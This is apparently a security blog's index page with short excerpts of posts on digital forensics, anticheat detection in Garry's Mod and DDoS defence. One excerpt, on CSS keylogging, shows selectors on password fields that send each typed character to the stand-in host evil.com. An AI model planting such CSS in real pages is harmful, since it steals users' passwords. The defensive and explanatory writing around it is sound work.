Recent Posts

banner
September 12, 2024

Problems of Digital Forensics

The main goal of digital forensics is the extraction of data from electronic evidence and its subsequent analysis and processing into usable information. A major challenge lies in the flexibilization…
March 21, 2024

Better solution for CSS keylogging

The described keylogger is avaliable on my GitHub. How it works A primitive approach is a one-to-one mapping between characters and selectors: input[type="password"][value$="a"] { background-image: url("http://evil.com/?key=a"); } input[type="password"][value$="b"] { background-image:…
March 27, 2024

Detect DoS attacks in Garry’s Mod

The code discussed in this post is part of my open source anticheat and can be found here. In the game Garry's Mod, client and server can communicate via Netmessages.…
March 25, 2024

A method to detect Lua cheats

The code I wrote for this article can be found here. When detecting cheats in the game Garry’s Mod you have countless options. Suppose we want to detect a known…
October 7, 2023

Defending a nasty amplified DDoS attack

Earlier this year, in response to some previous DDoS attacks on a Garry's Mod server, I developed a fully automated script to detect "anomalies" in traffic, create a tcpdump for…
October 7, 2023

Defense against a ridiculously bad DDoS attack

After I discussed an earlier DDoS attack this year there had been another interesting attack. However, this time it is such a bad attack that I wonder how an advertised…